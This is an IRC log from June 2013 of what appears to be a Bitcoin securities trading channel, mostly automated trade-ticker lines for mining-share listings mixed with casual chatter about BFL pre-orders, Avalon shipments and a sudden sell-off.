22:47:58 https://bitcointalk.org/index.php?topic=236794.msg2523030#msg2523030 Jun 19 22:48:33 -In order for me to keep my pre-orders Josh is making me do the following: Jun 19 22:48:34 Apologize Publicly for calling Josh and BFL liars Jun 19 22:48:34 Admit "Werner" is a sock puppet account uner my control Jun 19 22:48:34 Apologize for using "Werner" to troll him Jun 19 22:48:40 OMGLMAO HAHA Jun 19 22:48:47 [BTCTC] [ASICMINER-PT] 9 @ 2.79 = 25.11 BTC [+] Jun 19 22:48:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.027 = 0.054 BTC [-] Jun 19 22:48:51 bunch of idiots Jun 19 22:48:52 hahahah Jun 19 22:49:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.026901 = 0.0807 BTC [-] Jun 19 22:50:01 [BTCTC] [TAT.ASICMINER] 16 @ 0.026901 = 0.4304 BTC [-] Jun 19 22:50:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.026901 = 0.0807 BTC [-] Jun 19 22:50:44 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [+] Jun 19 22:51:06 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005804 BTC [-] Jun 19 22:51:08 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005802 = 0.0116 BTC [-] Jun 19 22:51:57 [HAVELOCK] [ASICM] 35 @ 0.0284897 = 0.9971 BTC [+] Jun 19 22:52:01 [BTCTC] [DMS.MINING] 21 @ 0.020359 = 0.4275 BTC [+] Jun 19 22:52:05 [BTCTC] [DMS.MINING] 21 @ 0.02036 = 0.4276 BTC [+] Jun 19 22:52:07 [BTCTC] [DMS.MINING] 50 @ 0.02036 = 1.018 BTC [+] Jun 19 22:52:12 [BTCTC] [DMS.MINING] 200 @ 0.02036 = 4.072 BTC [+] Jun 19 22:52:24 [BTCTC] [DMS.MINING] 50 @ 0.020361 = 1.0181 BTC [+] Jun 19 22:52:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02696 BTC [+] Jun 19 22:52:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.02695 = 0.1078 BTC [-] Jun 19 22:52:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.026903 BTC [-] Jun 19 22:53:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.02728 = 0.0818 BTC [+] Jun 19 22:53:26 [BTCTC] [ASICMINER-PT] 6 @ 2.79 = 16.74 BTC [+] Jun 19 22:53:33 [BTCTC] [DMS.PURCHASE] 150 @ 0.054499 = 8.1749 BTC [-] Jun 19 22:54:17 [HAVELOCK] [ASICM] 1 @ 0.02798336 BTC [-] Jun 19 22:55:12 [BTCTC] [DMS.PURCHASE] 1 @ 0.054499 BTC [-] Jun 19 22:58:13 that AM price dip was short-lived :) Jun 19 22:58:55 hurrrrr Jun 19 23:00:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.027279 = 0.2728 BTC [-] Jun 19 23:00:18 [BTCTC] [DMS.MINING] 1 @ 0.02037 BTC [+] Jun 19 23:00:32 [HAVELOCK] [ASICM] 2 @ 0.0274 = 0.0548 BTC [-] Jun 19 23:01:21 [BTCTC] [ASICMINER-PT] 18 @ 2.79 = 50.22 BTC [+] Jun 19 23:01:26 [BTCTC] [ASICMINER-PT] 5 @ 2.8 = 14 BTC [+] Jun 19 23:01:30 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [+] Jun 19 23:01:36 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 19 23:01:42 [BTCTC] [ASICMINER-PT] 1 @ 2.844999 BTC [+] Jun 19 23:01:46 [BTCTC] [ASICMINER-PT] 5 @ 2.845 = 14.225 BTC [+] Jun 19 23:01:55 [BTCTC] [ASICMINER-PT] 2 @ 2.846988 = 5.694 BTC [+] Jun 19 23:02:06 [BTCTC] [ASICMINER-PT] 2 @ 2.84699 = 5.694 BTC [+] Jun 19 23:03:45 [BTCTC] [RSM] 1 @ 0.0199 BTC [-] Jun 19 23:04:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.027279 BTC [-] Jun 19 23:04:30 [BTCTC] [DMS.PURCHASE] 100 @ 0.054499 = 5.4499 BTC [-] Jun 19 23:05:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.027279 BTC [-] Jun 19 23:07:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.027279 = 0.191 BTC [-] Jun 19 23:07:30 [BTCTC] [TAT.ASICMINER] 19 @ 0.02728 = 0.5183 BTC [+] Jun 19 23:07:38 [BTCTC] [TAT.ASICMINER] 16 @ 0.027293 = 0.4367 BTC [+] Jun 19 23:08:15 [BTCTC] [TAT.ASICMINER] 26 @ 0.027293 = 0.7096 BTC [+] Jun 19 23:08:17 [BTCTC] [RSM] 10 @ 0.018103 = 0.181 BTC [-] Jun 19 23:08:18 [BTCTC] [RSM] 10 @ 0.018102 = 0.181 BTC [-] Jun 19 23:08:20 [BTCTC] [RSM] 19 @ 0.0181 = 0.3439 BTC [-] Jun 19 23:08:31 [MPEX] [S.MPOE] 1201 @ 0.00067745 = 0.8136 BTC [-] Jun 19 23:08:33 [MPEX] [S.MPOE] 11599 @ 0.00067703 = 7.8529 BTC [-] Jun 19 23:09:00 [BTCTC] [TAT.ASICMINER] 25 @ 0.02777 = 0.6943 BTC [+] Jun 19 23:11:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02777 BTC [+] Jun 19 23:11:50 [BTCTC] [TAT.ASICMINER] 24 @ 0.02778 = 0.6667 BTC [+] Jun 19 23:11:51 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005605 = 0.2803 BTC [-] Jun 19 23:11:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005604 BTC [-] Jun 19 23:11:55 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.005602 = 0.0784 BTC [-] Jun 19 23:12:26 [HAVELOCK] [ASICM] 25 @ 0.028 = 0.7 BTC [+] Jun 19 23:17:45 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.005606 = 0.1402 BTC [+] Jun 19 23:17:51 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.0053 = 0.0636 BTC [-] Jun 19 23:18:16 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 19 23:19:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.02778 = 0.0833 BTC [+] Jun 19 23:21:18 [HAVELOCK] [ASICM] 1 @ 0.0282999 BTC [+] Jun 19 23:21:53 [HAVELOCK] [ASICM] 3 @ 0.028 = 0.084 BTC [-] Jun 19 23:22:15 [HAVELOCK] [ASICM] 1 @ 0.0282999 BTC [+] Jun 19 23:23:33 [BTCTC] [TAT.ASICMINER] 36 @ 0.02778 = 1.0001 BTC [+] Jun 19 23:23:34 [BTCTC] [TAT.ASICMINER] 15 @ 0.02779 = 0.4169 BTC [+] Jun 19 23:23:59 [HAVELOCK] [ASICM] 100 @ 0.0282999 = 2.83 BTC [+] Jun 19 23:24:02 [BTCTC] [S.DICE-PT] 8 @ 0.002403 = 0.0192 BTC [-] Jun 19 23:24:14 [BTCTC] [ASICMINER-PT] 10 @ 2.845 = 28.45 BTC [+] Jun 19 23:24:18 [BTCTC] [ASICMINER-PT] 4 @ 2.845 = 11.38 BTC [+] Jun 19 23:26:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02858 BTC [+] Jun 19 23:27:43 [BTCTC] [ASICMINER-PT] 1 @ 2.84699 BTC [+] Jun 19 23:28:25 [BTCTC] [ASICMINER-PT] 1 @ 2.847 BTC [+] Jun 19 23:29:28 [HAVELOCK] [ASICM] 4 @ 0.0282999 = 0.1132 BTC [+] Jun 19 23:30:15 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005201 = 0.2601 BTC [-] Jun 19 23:30:49 [HAVELOCK] [ASICM] 25 @ 0.0283 = 0.7075 BTC [+] Jun 19 23:31:28 [HAVELOCK] [ASICM] 46 @ 0.0283 = 1.3018 BTC [+] Jun 19 23:31:43 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Jun 19 23:36:30 [BTCTC] [ASICMINER-PT] 1 @ 2.800001 BTC [-] Jun 19 23:36:33 [BTCTC] [ASICMINER-PT] 20 @ 2.8 = 56 BTC [-] Jun 19 23:36:42 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0052 = 0.0104 BTC [-] Jun 19 23:36:44 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0052 = 0.026 BTC [-] Jun 19 23:43:40 [BTCTC] [TAT.ASICMINER] 38 @ 0.02856 = 1.0853 BTC [-] Jun 19 23:46:53 [HAVELOCK] [ASICM] 1 @ 0.0285 BTC [+] Jun 19 23:47:48 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.0052 = 0.0468 BTC [-] Jun 19 23:47:49 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0052 = 0.0104 BTC [-] Jun 19 23:48:06 [BTCTC] [ASICMINER-PT] 1 @ 2.84989 BTC [+] Jun 19 23:48:08 [BTCTC] [ASICMINER-PT] 1 @ 2.849899 BTC [+] Jun 19 23:48:10 [BTCTC] [ASICMINER-PT] 1 @ 2.8499 BTC [+] Jun 19 23:49:58 [HAVELOCK] [ASICM] 1 @ 0.0284 BTC [-] Jun 19 23:50:00 [HAVELOCK] [ASICM] 5 @ 0.02830001 = 0.1415 BTC [-] Jun 19 23:50:01 [HAVELOCK] [ASICM] 30 @ 0.0283 = 0.849 BTC [-] Jun 19 23:50:38 [HAVELOCK] [ASICM] 1 @ 0.0279 BTC [-] Jun 19 23:51:17 [BTCTC] [ASICMINER-PT] 1 @ 2.84999 BTC [+] Jun 19 23:55:45 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005949 = 0.0119 BTC [+] Jun 19 23:55:55 [BTCTC] [ASICMINER-PT] 1 @ 2.84999 BTC [+] Jun 19 23:56:21 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005059 = 0.0253 BTC [-] Jun 19 23:56:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.0285 = 0.285 BTC [-] Jun 19 23:57:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005058 BTC [-] Jun 19 23:57:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005058 BTC [-] Jun 19 23:58:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005058 BTC [-] Jun 19 23:59:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.028 = 0.56 BTC [-] Jun 20 00:00:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004902 BTC [-] Jun 20 00:00:34 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004901 = 0.0147 BTC [-] Jun 20 00:00:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0049 BTC [-] Jun 20 00:00:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004102 = 0.041 BTC [-] Jun 20 00:00:46 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0041 = 0.82 BTC [-] Jun 20 00:00:51 [BTCTC] [TAT.VIRTUALMINE] 59 @ 0.0041 = 0.2419 BTC [-] Jun 20 00:00:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.005058 = 0.0506 BTC [+] Jun 20 00:00:54 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.005059 = 0.1821 BTC [+] Jun 20 00:00:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.0285 = 0.342 BTC [+] Jun 20 00:00:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.02857 = 0.0857 BTC [+] Jun 20 00:00:59 [BTCTC] [TAT.ASICMINER] 20 @ 0.02859 = 0.5718 BTC [+] Jun 20 00:01:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004102 = 0.041 BTC [-] Jun 20 00:01:30 [BTCTC] [ASICMINER-PT] 1 @ 2.849999 BTC [+] Jun 20 00:01:35 [HAVELOCK] [ASICM] 7 @ 0.0283 = 0.1981 BTC [+] Jun 20 00:01:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00405 BTC [-] Jun 20 00:02:06 [HAVELOCK] [ASICM] 1 @ 0.0284 BTC [+] Jun 20 00:02:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.028 = 0.28 BTC [-] Jun 20 00:02:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.028 = 0.42 BTC [-] Jun 20 00:02:47 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004 = 0.04 BTC [-] Jun 20 00:02:54 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [+] Jun 20 00:03:00 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [+] Jun 20 00:03:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.02859 = 0.0572 BTC [+] Jun 20 00:04:19 [BTCTC] [ASICMINER-PT] 2 @ 2.856 = 5.712 BTC [+] Jun 20 00:04:30 [BTCTC] [DMS.MINING] 1 @ 0.020321 BTC [-] Jun 20 00:06:13 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005058 = 0.2529 BTC [+] Jun 20 00:06:14 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.005059 = 0.0455 BTC [+] Jun 20 00:06:46 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005059 = 0.253 BTC [+] Jun 20 00:07:32 [HAVELOCK] [ASICM] 7 @ 0.0283 = 0.1981 BTC [-] Jun 20 00:07:39 [HAVELOCK] [ASICM] 1 @ 0.028249 BTC [-] Jun 20 00:07:45 [HAVELOCK] [ASICM] 93 @ 0.0281 = 2.6133 BTC [-] Jun 20 00:07:56 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.005058 = 0.1821 BTC [-] Jun 20 00:08:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.02859 = 0.2287 BTC [+] Jun 20 00:08:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.02859 = 0.143 BTC [+] Jun 20 00:09:11 [BTCTC] [TAT.ASICMINER] 6 @ 0.02859 = 0.1715 BTC [+] Jun 20 00:09:52 [HAVELOCK] [ASICM] 1 @ 0.0279 BTC [-] Jun 20 00:12:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00475 BTC [-] Jun 20 00:14:42 [BTCTC] [TAT.ASICMINER] 80 @ 0.02859 = 2.2872 BTC [+] Jun 20 00:17:10 https://bitcointalk.org/index.php?topic=233048.msg2523877#msg2523877 Jun 20 00:18:26 [BTCTC] [ASICMINER-PT] 1 @ 2.8549 BTC [-] Jun 20 00:20:09 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004739 = 0.237 BTC [-] Jun 20 00:20:11 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00474 = 0.0474 BTC [+] Jun 20 00:20:12 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.00475 = 0.4703 BTC [+] Jun 20 00:20:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00482 BTC [+] Jun 20 00:20:58 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004102 = 0.082 BTC [-] Jun 20 00:20:59 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004101 = 0.2051 BTC [-] Jun 20 00:21:00 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.005057 = 0.0202 BTC [+] Jun 20 00:21:49 [BTCTC] [TAT.ASICMINER] 9 @ 0.02859 = 0.2573 BTC [+] Jun 20 00:21:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [+] Jun 20 00:23:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003801 BTC [-] Jun 20 00:25:37 [BTCTC] [DMS.SELLING] 13 @ 0.0343 = 0.4459 BTC [-] Jun 20 00:25:43 [BTCTC] [DMS.SELLING] 1 @ 0.0342 BTC [-] Jun 20 00:26:28 [HAVELOCK] [ASICM] 1 @ 0.0284 BTC [+] Jun 20 00:26:37 [BTCTC] [BTC-BOND] 33 @ 0.009807 = 0.3236 BTC [-] Jun 20 00:28:36 [BTCTC] [TAT.ASICMINER] 35 @ 0.0286 = 1.001 BTC [+] Jun 20 00:29:15 [BTCTC] [TAT.VIRTUALMINE] 61 @ 0.004001 = 0.2441 BTC [+] Jun 20 00:29:16 [BTCTC] [TAT.VIRTUALMINE] 81 @ 0.004 = 0.324 BTC [-] Jun 20 00:31:46 [BTCTC] [ASICMINER-PT] 2 @ 2.854999 = 5.71 BTC [+] Jun 20 00:31:49 [BTCTC] [ASICMINER-PT] 2 @ 2.855 = 5.71 BTC [+] Jun 20 00:31:51 [BTCTC] [ASICMINER-PT] 1 @ 2.856 BTC [+] Jun 20 00:31:52 [BTCTC] [ASICMINER-PT] 5 @ 2.865 = 14.325 BTC [+] Jun 20 00:31:54 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [+] Jun 20 00:31:58 [BTCTC] [ASICMINER-PT] 1 @ 2.8709 BTC [+] Jun 20 00:32:00 [BTCTC] [ASICMINER-PT] 1 @ 2.8789 BTC [+] Jun 20 00:32:11 [BTCTC] [ASICMINER-PT] 3 @ 2.879 = 8.637 BTC [+] Jun 20 00:32:12 [BTCTC] [ASICMINER-PT] 1 @ 2.8796 BTC [+] Jun 20 00:32:22 [BTCTC] [ASICMINER-PT] 14 @ 2.88 = 40.32 BTC [+] Jun 20 00:32:23 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [+] Jun 20 00:33:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004 BTC [-] Jun 20 00:35:29 [BTCTC] [ASICMINER-PT] 1 @ 2.879 BTC [-] Jun 20 00:35:42 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [+] Jun 20 00:35:46 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [+] Jun 20 00:37:05 [BTCTC] [BTC-BOND] 11 @ 0.009803 = 0.1078 BTC [-] Jun 20 00:37:24 [BTCTC] [BTC-BOND] 41 @ 0.009802 = 0.4019 BTC [-] Jun 20 00:38:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.0286 = 0.286 BTC [+] Jun 20 00:44:29 [BTCTC] [ASICMINER-PT] 1 @ 2.801001 BTC [-] Jun 20 00:44:37 [BTCTC] [ASICMINER-PT] 1 @ 2.801001 BTC [-] Jun 20 00:45:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.0286 = 0.0572 BTC [+] Jun 20 00:45:41 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004102 = 0.2051 BTC [+] Jun 20 00:45:48 [BTCTC] [ASICMINER-PT] 2 @ 2.801001 = 5.602 BTC [-] Jun 20 00:45:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004101 = 0.041 BTC [-] Jun 20 00:45:53 [BTCTC] [TAT.VIRTUALMINE] 123 @ 0.0041 = 0.5043 BTC [-] Jun 20 00:46:07 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004005 = 0.2003 BTC [-] Jun 20 00:46:14 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004002 = 0.08 BTC [-] Jun 20 00:46:17 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.004 = 0.12 BTC [-] Jun 20 00:46:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0043 BTC [+] Jun 20 00:46:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00461 BTC [+] Jun 20 00:46:28 [BTCTC] [TAT.VIRTUALMINE] 62 @ 0.004777 = 0.2962 BTC [+] Jun 20 00:46:30 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004778 = 0.2389 BTC [+] Jun 20 00:46:33 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004795 = 0.4795 BTC [+] Jun 20 00:46:35 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.004995 = 0.1349 BTC [+] Jun 20 00:46:37 [BTCTC] [TAT.VIRTUALMINE] 133 @ 0.005 = 0.665 BTC [+] Jun 20 00:46:39 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.005057 = 0.0455 BTC [+] Jun 20 00:49:20 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.00355 = 0.1278 BTC [-] Jun 20 00:49:22 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.00352 = 0.1056 BTC [-] Jun 20 00:49:23 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00351 = 0.1755 BTC [-] Jun 20 00:49:25 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.0035 = 0.245 BTC [-] Jun 20 00:50:43 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0035 = 0.105 BTC [-] Jun 20 00:50:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00344 BTC [-] Jun 20 00:50:46 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003137 = 0.0314 BTC [-] Jun 20 00:50:47 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0031 = 0.62 BTC [-] Jun 20 00:51:06 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00351 = 0.0176 BTC [+] Jun 20 00:51:25 [BTCTC] [BASIC-MINING] 16 @ 0.71 = 11.36 BTC [+] Jun 20 00:51:27 [BTCTC] [BASIC-MINING] 17 @ 0.719999 = 12.24 BTC [+] Jun 20 00:51:48 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.0035 = 3.5 BTC [-] Jun 20 00:52:05 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.003 = 3 BTC [-] **** ENDING LOGGING AT Thu Jun 20 01:09:12 2013 **** BEGIN LOGGING AT Thu Jun 20 01:09:35 2013 Jun 20 01:09:53 [BTCTC] [ASICMINER-PT] 5 @ 2.873998 = 14.37 BTC [+] Jun 20 01:10:13 TAT, you're dangerous. Jun 20 01:10:24 you have no idea Jun 20 01:10:45 I have an auto trader bot that guages sentiment solely on what TAT says Jun 20 01:11:00 thought it would be fitting given his disdain for auto trading Jun 20 01:11:19 does it trade iDiffs? i suspect so Jun 20 01:11:26 only if TAT says so Jun 20 01:12:00 but what about all the things i say privately? Jun 20 01:12:09 it ignores those completely Jun 20 01:12:47 unless you decide to cyber Jun 20 01:13:52 your keyboard says otherwise Jun 20 01:14:35 http://imgur.com/a/fqpME Avalon Facility Jun 20 01:15:09 [BTCTC] [BASIC-MINING] 50 @ 0.72 = 36 BTC [+] Jun 20 01:15:11 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [+] Jun 20 01:15:12 [BTCTC] [BASIC-MINING] 47 @ 0.73 = 34.31 BTC [+] Jun 20 01:15:14 what it looks like to not ship Jun 20 01:18:27 [BTCTC] [TAT.ASICMINER] 16 @ 0.028003 = 0.448 BTC [-] Jun 20 01:18:34 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.005057 = 0.1011 BTC [+] Jun 20 01:18:36 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.005057 = 0.0202 BTC [+] Jun 20 01:18:36 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.005058 = 0.0809 BTC [+] Jun 20 01:19:40 [BTCTC] [ASICMINER-PT] 1 @ 2.805001 BTC [-] Jun 20 01:19:53 [BTCTC] [S.DICE-PT] 5 @ 0.002403 = 0.012 BTC [-] Jun 20 01:20:43 [BTCTC] [TAT.ASICMINER] 16 @ 0.028003 = 0.448 BTC [-] Jun 20 01:22:58 [BTCTC] [ASICMINER-PT] 1 @ 2.805001 BTC [-] Jun 20 01:23:11 [BTCTC] [ASICMINER-PT] 1 @ 2.805 BTC [-] Jun 20 01:23:25 [BTCTC] [ASICMINER-PT] 1 @ 2.80101 BTC [-] Jun 20 01:23:30 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Jun 20 01:23:33 [BTCTC] [ASICMINER-PT] 1 @ 2.783202 BTC [-] Jun 20 01:23:38 [BTCTC] [ASICMINER-PT] 1 @ 2.7832 BTC [-] Jun 20 01:23:43 [BTCTC] [ASICMINER-PT] 1 @ 2.7822 BTC [-] Jun 20 01:23:51 [BTCTC] [ASICMINER-PT] 3 @ 2.781211 = 8.3436 BTC [-] Jun 20 01:23:53 [BTCTC] [ASICMINER-PT] 1 @ 2.78121 BTC [-] Jun 20 01:23:55 [BTCTC] [ASICMINER-PT] 1 @ 2.751 BTC [-] Jun 20 01:23:57 [BTCTC] [ASICMINER-PT] 2 @ 2.751 = 5.502 BTC [-] Jun 20 01:24:03 [BTCTC] [ASICMINER-PT] 2 @ 2.741 = 5.482 BTC [-] Jun 20 01:24:05 [BTCTC] [TAT.ASICMINER] 22 @ 0.028599 = 0.6292 BTC [+] Jun 20 01:24:06 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Jun 20 01:24:08 [BTCTC] [ASICMINER-PT] 10 @ 2.7 = 27 BTC [-] Jun 20 01:24:13 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [-] Jun 20 01:24:15 [BTCTC] [ASICMINER-PT] 1 @ 2.681 BTC [-] Jun 20 01:24:24 [BTCTC] [ASICMINER-PT] 4 @ 2.67 = 10.68 BTC [-] Jun 20 01:24:26 [BTCTC] [ASICMINER-PT] 1 @ 2.663 BTC [-] Jun 20 01:24:34 [BTCTC] [ASICMINER-PT] 1 @ 2.661 BTC [-] Jun 20 01:24:37 [BTCTC] [ASICMINER-PT] 1 @ 2.66011 BTC [-] Jun 20 01:24:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.028003 = 0.28 BTC [-] Jun 20 01:24:41 [BTCTC] [ASICMINER-PT] 4 @ 2.66 = 10.64 BTC [-] Jun 20 01:24:43 [BTCTC] [ASICMINER-PT] 1 @ 2.634 BTC [-] Jun 20 01:24:44 [BTCTC] [ASICMINER-PT] 1 @ 2.632 BTC [-] Jun 20 01:24:46 [BTCTC] [ASICMINER-PT] 1 @ 2.6305 BTC [-] Jun 20 01:24:47 [BTCTC] [ASICMINER-PT] 1 @ 2.6301 BTC [-] Jun 20 01:24:49 [BTCTC] [ASICMINER-PT] 1 @ 2.6301 BTC [-] Jun 20 01:24:56 it wasnt me! Jun 20 01:25:32 [BTCTC] [TAT.VIRTUALMINE] 160 @ 0.00357 = 0.5712 BTC [-] Jun 20 01:25:38 crazy day Jun 20 01:25:41 [BTCTC] [TAT.VIRTUALMINE] 69 @ 0.003566 = 0.2461 BTC [-] Jun 20 01:25:44 [BTCTC] [TAT.VIRTUALMINE] 81 @ 0.00356 = 0.2884 BTC [-] Jun 20 01:25:58 maybe someone got hacked? Jun 20 01:26:13 [HAVELOCK] [ASICM] 71 @ 0.0283 = 2.0093 BTC [-] Jun 20 01:26:24 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.003561 = 0.2493 BTC [+] Jun 20 01:27:12 Geez, what's going on? Jun 20 01:28:27 can't wait for the "Why is TAT.VM price falling!?" posts.... Jun 20 01:28:58 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] Jun 20 01:29:40 [HAVELOCK] [ASICM] 3 @ 0.028399 = 0.0852 BTC [+] Jun 20 01:29:45 [BTCTC] [ASICMINER-PT] 1 @ 2.8495 BTC [+] Jun 20 01:29:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.028003 = 0.14 BTC [-] Jun 20 01:30:52 [HAVELOCK] [ASICM] 1 @ 0.028399 BTC [+] Jun 20 01:31:54 [MPEX] [S.MPOE] 13341 @ 0.00067797 = 9.0448 BTC [+] Jun 20 01:31:56 [MPEX] [S.MPOE] 8109 @ 0.00067998 = 5.514 BTC [+] Jun 20 01:32:57 cmon i want more crazy selloffs Jun 20 01:33:02 bring it Jun 20 01:33:28 [HAVELOCK] [ASICM] 3 @ 0.028399 = 0.0852 BTC [+] Jun 20 01:34:42 [BTCTC] [BASIC-MINING] 2 @ 0.73 = 1.46 BTC [+] Jun 20 01:34:44 [HAVELOCK] [ASICM] 4 @ 0.028399 = 0.1136 BTC [+] Jun 20 01:34:56 so like a day after Avalon gets caught hashing on the side, https://bitcointalk.org/index.php?topic=238391.msg2524454#msg2524454 Jun 20 01:35:04 they are shipping en masse! Jun 20 01:35:07 rejoice! Jun 20 01:35:14 lololol Jun 20 01:35:21 [BTCTC] [BASIC-MINING] 1 @ 0.73 BTC [+] Jun 20 01:35:57 ;;nethash Jun 20 01:35:57 130624.625073 Jun 20 01:36:04 too funny Jun 20 01:36:15 [HAVELOCK] [ASICM] 5 @ 0.028399 = 0.142 BTC [+] Jun 20 01:36:28 [BTCTC] [BASIC-MINING] 4 @ 0.74 = 2.96 BTC [+] Jun 20 01:36:40 [BTCTC] [BASIC-MINING] 46 @ 0.74 = 34.04 BTC [+] Jun 20 01:37:09 ;;bcstats Jun 20 01:37:11 Current Blocks: 242347 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1588 blocks | Next Difficulty In About: 1 week, 4 days, 16 hours, 14 minutes, and 7 seconds | Next Difficulty Estimate: 18914088.0178 | Estimated Percent Change: -2.19848 Jun 20 01:37:53 -2% :o Jun 20 01:37:57 [HAVELOCK] [ASICM] 3 @ 0.028399 = 0.0852 BTC [+] Jun 20 01:38:11 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jun 20 01:39:06 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00365 = 0.0365 BTC [+] Jun 20 01:39:08 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003643 = 0.0109 BTC [-] Jun 20 01:39:08 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003633 = 0.109 BTC [-] Jun 20 01:39:10 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003621 = 0.1811 BTC [-] Jun 20 01:39:11 [BTCTC] 